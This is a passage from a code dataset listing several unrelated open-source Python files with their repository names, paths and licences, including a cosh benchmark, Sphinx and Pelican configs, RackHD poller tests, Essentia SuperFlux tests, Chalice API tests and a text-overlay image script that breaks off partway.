code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
#!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark cosh."""
from __future__ import print_function
import timeit
NAME = "cosh"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from math import cosh; from random import random;"
stmt = "y = cosh(10.0*random() - 5.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
|
stdlib-js/stdlib
|
lib/node_modules/@stdlib/math/base/special/cosh/benchmark/python/benchmark.py
|
Python
|
apache-2.0
| 2,165
|
"""Send a picture Fling"""
import pyfling
f = pyfling.Fling("XXXXXXXX")
img_url = f.upload("test.jpg")
#img_url = "http://lorempixel.com/640/1138"
result = f.send_image(img_url)
print(result)
|
davejm/pyfling
|
examples.sendimage.py
|
Python
|
mit
| 194
|
# -*- coding: utf-8 -*-
#
# pytest-single_file_logging documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 1 00:43:18 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.ifconfig',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pytest-pytest-single_file_logging'
copyright = u'2015, Chris Saxey'
author = u'Chris Saxey'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.0'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pytest-cookiecutterplugin_namedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pytest-cookiecutterplugin_name.tex', u'pytest-\\{\\{cookiecutter.plugin\\_name\\}\\} Documentation',
u'\\{\\{cookiecutter.full\\_name\\}\\}', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pytest-cookiecutterplugin_name', u'pytest-pytest-single_file_logging Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pytest-cookiecutterplugin_name', u'pytest-pytest-single_file_logging Documentation',
author, 'pytest-cookiecutterplugin_name', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
darthghandi/pytest-single-file-logging
|
docs/conf.py
|
Python
|
apache-2.0
| 9,465
|
import os
path = os.path.dirname(os.path.realpath(__file__))
sbmlFilePath = os.path.join(path, 'BIOMD0000000028.xml')
with open(sbmlFilePath,'r') as f:
sbmlString = f.read()
def module_exists(module_name):
try:
__import__(module_name)
except ImportError:
return False
else:
return True
if module_exists('libsbml'):
import libsbml
sbml = libsbml.readSBMLFromString(sbmlString)
|
biomodels/BIOMD0000000028
|
BIOMD0000000028/model.py
|
Python
|
cc0-1.0
| 427
|
#
# The Python Imaging Library
# $Id$
#
# GRIB stub adapter
#
# Copyright (c) 1996-2003 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import Image, ImageFile
_handler = None
##
# Install application-specific GRIB image handler.
#
# @param handler Handler object.
def register_handler(handler):
global _handler
_handler = handler
# --------------------------------------------------------------------
# Image adapter
def _accept(prefix):
return prefix[0:4] == "GRIB" and prefix[7] == chr(1)
class GribStubImageFile(ImageFile.StubImageFile):
format = "GRIB"
format_description = "GRIB"
def _open(self):
offset = self.fp.tell()
if not _accept(self.fp.read(8)):
raise SyntaxError("Not a GRIB file")
self.fp.seek(offset)
# make something up
self.mode = "F"
self.size = 1, 1
loader = self._load()
if loader:
loader.open(self)
def _load(self):
return _handler
def _save(im, fp, filename):
if _handler is None or not hasattr("_handler", "save"):
raise IOError("GRIB save handler not installed")
_handler.save(im, fp, filename)
# --------------------------------------------------------------------
# Registry
Image.register_open(GribStubImageFile.format, GribStubImageFile, _accept)
Image.register_save(GribStubImageFile.format, _save)
Image.register_extension(GribStubImageFile.format, ".grib")
|
robiame/AndroidGeodata
|
pil/GribStubImagePlugin.py
|
Python
|
mit
| 1,558
|
'''
Copyright 2016, EMC, Inc.
Author(s):
FIT test script template
'''
import fit_path # NOQA: unused import
import sys
import subprocess
import pprint
import fit_common
import test_api_utils
# LOCAL
NODELIST = []
def get_switches():
# returns a list with valid node IDs that match ARGS_LIST.sku in 'Name' or 'Model' field
# and matches node BMC MAC address in ARGS_LIST.obmmac if specified
# Otherwise returns list of all IDs that are not 'Unknown' or 'Unmanaged'
nodelist = []
# check if user specified a single nodeid to run against
# user must know the nodeid and any check for a valid nodeid is skipped
nodeid = fit_common.fitargs()['nodeid']
if nodeid != 'None':
nodelist.append(nodeid)
else:
catalog = fit_common.rackhdapi('/api/1.1/nodes')
for nodeentry in catalog['json']:
if nodeentry['type'] == 'switch':
nodelist.append(nodeentry['id'])
return nodelist
NODELIST = get_switches()
def get_rackhd_nodetype(nodeid):
nodetype = ""
# get the node info
mondata = fit_common.rackhdapi("/api/1.1/nodes/" + nodeid)
if mondata['status'] != 200:
print "Incorrect HTTP return code on nodeid, expected 200, received: {}".format(mondata['status'])
else:
# get the sku id contained in the node
sku = mondata['json'].get("sku")
if sku:
skudata = fit_common.rackhdapi("/api/1.1/skus/" + sku)
if skudata['status'] != 200:
print "Incorrect HTTP return code on sku, expected 200, received: {}".format(skudata['status'])
else:
nodetype = mondata['json'].get("name")
else:
nodetype = mondata['json'].get("name")
print "nodeid {} did not return a valid sku in get_rackhd_nodetype".format(nodeid)
return nodetype
from nose.plugins.attrib import attr
@attr(all=True, regression=True, smoke=True)
@fit_common.unittest.skipIf(NODELIST == [],"No switches defined, skipping test.")
class rackhd11_switch_pollers(fit_common.unittest.TestCase):
def test_get_id_pollers(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display the poller data per node."
print "\t{0}".format(msg)
for node in NODELIST:
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code")
for item in mon_data['json']:
# check required fields
self.assertGreater(item['pollInterval'], 0, 'pollInterval field error')
for subitem in ['node', 'config', 'createdAt', 'id', 'name', 'config']:
self.assertIn(subitem, item, subitem + ' field error')
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poll_data = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id)
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
print fit_common.json.dumps(poll_data['json'], indent=4)
def test_verify_poller_headers(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Verify header data reported on the poller"
print "\t{0}".format(msg)
for node in NODELIST:
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code")
nodetype = get_rackhd_nodetype(node)
if fit_common.VERBOSITY >= 2:
print "\nNode: {} Type: {}".format(node, nodetype)
# Run test against managed nodes only
if nodetype != "unknown" and nodetype != "Unmanaged":
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poller_data = test_api_utils.get_poller_data_by_id(poller_id)
if fit_common.VERBOSITY >= 3:
print "\nPoller: " + poller + " ID: " + str(poller_id)
print fit_common.json.dumps(poller_data, indent=4)
def test_verify_poller_data(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Check number of polls being kept for poller ID"
print "\t{0}".format(msg)
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
nodetype = get_rackhd_nodetype(node)
# Run test against managed nodes only
if nodetype != "unknown" and nodetype != "Unmanaged":
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poller_data = test_api_utils.get_poller_data_by_id(poller_id)
poll_len = len(poller_data)
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
print "Number of polls for "+ str(poller_id) + ": " + str(len(poller_data))
self.assertLessEqual(poll_len, 10, 'Number of cached polls should not exceed 10')
def test_get_current_poller_data(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display most current data from poller"
print "\t{0}".format(msg)
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
nodetype = get_rackhd_nodetype(node)
# Run test against managed nodes only
if nodetype != "unknown" and nodetype != "Unmanaged":
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
monurl = "/api/1.1/pollers/" + str(poller_id) + "/data/current"
mondata = fit_common.rackhdapi(url_cmd=monurl)
if fit_common.VERBOSITY >= 2:
print fit_common.json.dumps(mondata, indent=4)
def test_get_poller_status_timestamp(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display status and timestamp from current poll"
print "\t{0}".format(msg)
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
nodetype = get_rackhd_nodetype(node)
# Run test against managed nodes only
if nodetype != "unknown" and nodetype != "Unmanaged":
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
monurl = "/api/1.1/pollers/" + str(poller_id) + "/data/current"
mondata = fit_common.rackhdapi(url_cmd=monurl)
print "Return status", mondata['status']
if mondata['status'] == 200:
if fit_common.VERBOSITY >= 2:
print "Timestamp:", mondata['json'][0]['timestamp']
print fit_common.json.dumps(mondata['json'][0], indent=4)
def test_verify_poller_error_counter(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Check for Poller Errors"
print "\t{0}".format(msg)
errorlist = []
for node in NODELIST:
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code")
for item in mon_data['json']:
# check required fields
self.assertGreater(item['pollInterval'], 0, 'pollInterval field error')
for subitem in ['node', 'config', 'createdAt', 'id', 'name', 'config', 'updatedAt']:
self.assertIn(subitem, item, subitem + ' field error')
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poll_data = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id)
poll_fails = poll_data['json'].get('failureCount', 0)
if poll_fails != 0:
errorlist.append("Node: {} Poller: {} {} reported {} failureCount".format(node,
poller,
poller_id,
poll_fails))
if errorlist != []:
print "{}".format(fit_common.json.dumps(errorlist, indent=4))
self.assertEqual(errorlist, [], "Error reported in Pollers")
else:
if fit_common.VERBOSITY >= 2:
print ("No Poller errors found")
def test_get_nodes_id_pollers(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display the poller updated-at per node."
print "\t{0}".format(msg)
node = 0
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code")
for item in mon_data['json']:
# check required fields
self.assertGreater(item['pollInterval'], 0, 'pollInterval field error')
for subitem in ['node', 'config', 'createdAt', 'id', 'name', 'config', 'updatedAt']:
self.assertIn(subitem, item, subitem + ' field error')
poller_dict = test_api_utils.get_supported_pollers(node)
for poller in poller_dict:
poller_id = poller_dict[poller]["poller_id"]
poll_data = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id)
if fit_common.VERBOSITY >= 2:
print "\nPoller: " + poller + " ID: " + str(poller_id)
pprint.pprint("Created At: {}".format(poll_data['json']['createdAt']))
pprint.pprint("Updated At: {}".format(poll_data['json']['updatedAt']))
def test_check_poller_interval(self):
if fit_common.VERBOSITY >= 2:
msg = "Description: Display the poller interval."
print "\t{0}".format(msg)
for node in NODELIST:
if fit_common.VERBOSITY >= 2:
print "\nNode: ", node
mon_data = fit_common.rackhdapi("/api/1.1/nodes/" + node + "/pollers")
self.assertIn(mon_data['status'], [200], "Incorrect HTTP return code, expected 200, got {}".format(mon_data['status']))
poller_list = []
if fit_common.VERBOSITY >= 2:
print fit_common.json.dumps(mon_data['json'], indent=4)
for item in mon_data['json']:
poller_list.append(item['id'])
for poller_id in poller_list:
poller = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id )
self.assertIn(poller['status'], [200], "Incorrect HTTP return code")
pollerdata = poller['json']
# check required fields
self.assertGreater(pollerdata['pollInterval'], 0, 'pollInterval field error')
poller_interval = pollerdata['pollInterval']
pollertime = poller_interval / 1000
if fit_common.VERBOSITY >= 2:
print "pollerInterval", poller_interval
print pollerdata['config'].get('metric', "")
print pollerdata.get('nextScheduled', "")
print pollertime
pollcurrent = fit_common.rackhdapi("/api/1.1/pollers/" + poller_id + "/data/current" )
self.assertIn(pollcurrent['status'], [200], "Incorrect HTTP return code")
if fit_common.VERBOSITY >= 2:
print pollcurrent
if __name__ == '__main__':
fit_common.unittest.main()
|
tannoa2/RackHD
|
test/tests/switch/test_rackhd11_switch_pollers.py
|
Python
|
apache-2.0
| 12,932
|
#!/usr/bin/env python
# Copyright (C) 2006-2021 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
from essentia_test import *
from essentia.standard import MonoLoader, SuperFluxExtractor
from numpy import *
class TestSuperFluxExtractor(TestCase):
def testInvalidParam(self):
# All the parameters ranges are theoretically from 0 to infinity
# Hence, we use neg. value for invalid checks.
self.assertConfigureFails(SuperFluxExtractor(), { 'combine': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'frameSize': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'hopSize': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'ratioThreshold': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'sampleRate': -1})
self.assertConfigureFails(SuperFluxExtractor(), { 'threshold': -1})
def testRegressionDubstep(self):
audio = MonoLoader(filename=join(testdata.audio_dir, 'recorded', 'dubstep.wav'))()
# This test case will use the documented default parameters from recording dubstep.wav
onsets = SuperFluxExtractor(combine=30,frameSize=2048,hopSize=256,ratioThreshold=16,
sampleRate=44100,threshold=0.5)(audio)
# This commented out code was used to obtain reference samples for storing in a file.
# save('superfluxdub', onsets)
# Reference samples are loaded as expected values
expected_superflux = load(join(filedir(), 'superflux/superfluxdub.npy'))
self.assertAlmostEqualVector(onsets, expected_superflux, 1e-5)
def testRegressionTechnoloop(self):
audio = MonoLoader(filename=join(testdata.audio_dir, 'recorded', 'techno_loop.wav'))()
# This test case will use peak parameters slighlt ifferent from default from recording techno_loop.wav
onsets = SuperFluxExtractor(combine=20,frameSize=2048,hopSize=256,ratioThreshold=8,
sampleRate=44100,threshold=0.25)(audio)
# This commented out code was used to obtain reference samples for storing in a file.
# save('superfluxtechno', onsets)
# Reference samples are loaded as expected values
expected_superflux = load(join(filedir(), 'superflux/superfluxtechno.npy'))
self.assertAlmostEqualVector(onsets, expected_superflux, 1e-5)
def _assertVectorWithinVector(self, found, expected, precision=1e-5):
for i in range(len(found)):
for j in range(1,len(expected)):
if found[i] <= expected[j] and found[i] >= expected[j-1]:
if fabs(found[i] - expected[j-1]) < fabs(expected[j] - found[i]):
self.assertAlmostEqual(found[i], expected[j-1], precision)
else:
self.assertAlmostEqual(found[i], expected[j], precision)
def testSilence(self):
# zeros should return no onsets (empty array)
self.assertEqualVector(SuperFluxExtractor()(zeros(44100)), [])
def testEmpty(self):
# empty input should return no onsets (empty array)
self.assertEqualVector(SuperFluxExtractor()([]), [])
def testImpulse(self):
# Given an impulse should return its position
sampleRate = 44100
frameSize = 2048
hopSize = 256
signal = zeros(sampleRate * 2)
# impulses at 0:30 and 1:00
signal[22050] = 1.
signal[44100] = 1.
expected = [0.5, 1.]
result = SuperFluxExtractor(sampleRate=sampleRate, frameSize=frameSize,
hopSize=hopSize)(signal)
# SuperfluxPeaks has a parameter 'combine' which is a threshold that
# puts together consecutive peaks. This means that a peak will be
# detected as soon as it is seen by a frame. Thus, the frame size
# also influences the expected precision of the algorithm.
precision = (hopSize + frameSize) / sampleRate
self.assertAlmostEqualVectorAbs(result, expected, precision)
suite = allTests(TestSuperFluxExtractor)
if __name__ == '__main__':
TextTestRunner(verbosity=2).run(suite)
|
MTG/essentia
|
test/src/unittests/rhythm/test_superfluxextractor.py
|
Python
|
agpl-3.0
| 4,892
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
# This file is only used if you use `make publish` or
# explicitly specify it as your config file.
import os
import sys
sys.path.append(os.curdir)
from pelicanconf import *
import datetime
CURYEAR = datetime.date.today().year
HOMEURL = 'http://huisaddison.com'
HOMENAME = 'huisaddison'
SITEURL = 'http://huisaddison.com/blog'
SITENAME = 'huisaddison/blog'
BLOGSOURCEURL = 'https://github.com/huisaddison/blog'
STATIC_PATHS = ['img']
RELATIVE_URLS = False
DELETE_OUTPUT_DIRECTORY = True
PLUGIN_PATHS = ['../pelican-plugins']
PLUGINS = [
'render_math',
'tipue_search',
]
THEMES = '../blog-theme'
DIRECT_TEMPLATES=((
'index',
'tags',
'categories',
'authors',
'archives',
'search',
))
# Following items are often useful when publishing
#DISQUS_SITENAME = ""
#GOOGLE_ANALYTICS = ""
|
huisaddison/blog
|
publishconf.py
|
Python
|
gpl-3.0
| 911
|
import unittest
from kivy3 import Object3D
from tests.utils import Sandbox
class DummyObject:
pass
class Object3DTest(unittest.TestCase):
def setUp(self):
self.sandbox = Sandbox()
self.obj = Object3D()
def tearDown(self):
self.sandbox.restore()
def test_position(self):
obj = self.obj
obj.pos.x = 10
self.assertEqual(obj._position[0], 10)
obj.position.y = 8
self.assertEqual(obj._position[1], 8)
obj.pos.z = 3
self.assertEqual(obj._position[2], 3)
def test_add_objects(self):
obj = self.obj
self.sandbox.stub(obj, '_add_child')
obj.add(DummyObject(), DummyObject(), DummyObject())
self.assertEqual(obj._add_child.call_count, 3)
def test_add_child(self):
obj = self.obj
child = DummyObject()
obj._add_child(child)
self.assertEqual(child.parent, obj)
self.assertEqual(len(obj.children), 1)
if __name__ == "__main__":
unittest.main()
|
nskrypnik/kivy3
|
tests/core/test_object3d.py
|
Python
|
mit
| 1,024
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""
Unit tests for the app.py functions. These tests use the chalice.test.Client
class provided by AWS Chalice to simplify route testing.
"""
import json
from unittest.mock import MagicMock
import pytest
from chalice.app import RequestTimeoutError
from chalice.test import Client
import app
from chalicelib.library_data import DataServiceNotReadyException
@pytest.fixture
def mock_storage(monkeypatch):
_storage = MagicMock(
get_books=MagicMock(return_value=['book1', 'book2']),
add_book=MagicMock(return_value=('author1', 'book1')),
get_authors=MagicMock(return_value=['author1', 'author2']),
get_patrons=MagicMock(return_value=['patron1', 'patron2']),
add_patron=MagicMock(return_value='patron1'),
delete_patron=MagicMock(return_value='delete_patron'),
get_borrowed_books=MagicMock(return_value=['book1', 'book2']),
borrow_book=MagicMock(return_value='borrow_book'),
return_book=MagicMock(return_value='return_book')
)
monkeypatch.setattr(app, 'get_storage', lambda: _storage)
return _storage
def test_index():
with Client(app.app) as client:
response = client.http.get('/')
assert response.json_body == {
'description': 'A simple lending library REST API that runs entirely on '
'serverless components.'}
def test_list_books(mock_storage):
with Client(app.app) as client:
response = client.http.get('/books')
mock_storage.get_books.assert_called_with()
assert response.json_body == {'books': ['book1', 'book2']}
def test_list_books_timeout(mock_storage):
mock_storage.get_books = MagicMock(
side_effect=DataServiceNotReadyException('Timeout test'))
with Client(app.app) as client:
response = client.http.get('/books')
assert response.status_code == 408
def test_add_book(mock_storage):
with Client(app.app) as client:
test_book = {'Books.Title': 'test-book'}
response = client.http.post(
'/books', headers={'content-type': 'application/json'},
body=json.dumps(test_book))
mock_storage.add_book.assert_called_with(test_book)
assert response.json_body == {
'Authors.AuthorID': 'author1', 'Books.BookID': 'book1'}
def test_list_books_by_author(mock_storage):
with Client(app.app) as client:
author_id = 15
response = client.http.get(f'/books/{author_id}')
mock_storage.get_books.assert_called_with(author_id=author_id)
assert response.json_body == {'books': ['book1', 'book2']}
def test_list_authors(mock_storage):
with Client(app.app) as client:
response = client.http.get('/authors')
mock_storage.get_authors.assert_called_with()
assert response.json_body == {'authors': ['author1', 'author2']}
def test_list_patrons(mock_storage):
with Client(app.app) as client:
response = client.http.get('/patrons')
mock_storage.get_patrons.assert_called_with()
assert response.json_body == {'patrons': ['patron1', 'patron2']}
def test_add_patron(mock_storage):
with Client(app.app) as client:
patron = {'Patrons.FirstName': 'Pierre'}
response = client.http.post(
'/patrons', headers={'content-type': 'application/json'},
body=json.dumps(patron))
mock_storage.add_patron.assert_called_with(patron)
assert response.json_body == {'Patrons.PatronID': 'patron1'}
def test_delete_patron(mock_storage):
with Client(app.app) as client:
patron_id = 55
client.http.delete(f'/patrons/{patron_id}')
mock_storage.delete_patron.assert_called_with(patron_id)
def test_list_borrowed_books(mock_storage):
with Client(app.app) as client:
response = client.http.get('/lending')
mock_storage.get_borrowed_books.assert_called_with()
assert response.json_body == {'books': ['book1', 'book2']}
def test_borrow_book(mock_storage):
with Client(app.app) as client:
book_id = 5
patron_id = 13
client.http.put(f'/lending/{book_id}/{patron_id}')
mock_storage.borrow_book(book_id, patron_id)
def test_return_book(mock_storage):
with Client(app.app) as client:
book_id = 5
patron_id = 13
client.http.delete(f'/lending/{book_id}/{patron_id}')
mock_storage.return_book(book_id, patron_id)
|
awsdocs/aws-doc-sdk-examples
|
python/cross_service/aurora_rest_lending_library/library_api/test/test_library_api_app.py
|
Python
|
apache-2.0
| 4,526
|
#!/usr/bin/env python
from PIL import Image, ImageDraw, ImageFont, ImageEnhance
import re
import sys
import argparse
import os.path
##
## @brief Recreates an image with code/text as pixels
##
## @param img The image
## @param text The text
## @param font The font
## @param fontSize The font size
##
## @return the altered image
##
def textOverlayInverse(img, text, font = "default", fontSize = 10):
front = Image.new('RGBA', img.size)
out = Image.new('RGBA', img.size, (255,255,255,0))
draw = ImageDraw.Draw(front)
if (font == "default"):
font = ImageFont.load_default()
else:
font = ImageFont.truetype(font, fontSize)
# determining the size of the font...
sentence = "The quick brown fox jumps over the lazy dog"
font_w, font_h = font.getsize(sentence)
font_w = font_w / len(sentence) # to get the approximate average width of the text
nRowChars = img.size[0] / font_w + 1
y_text = 0
a, img_height = img.size
textTmp = text
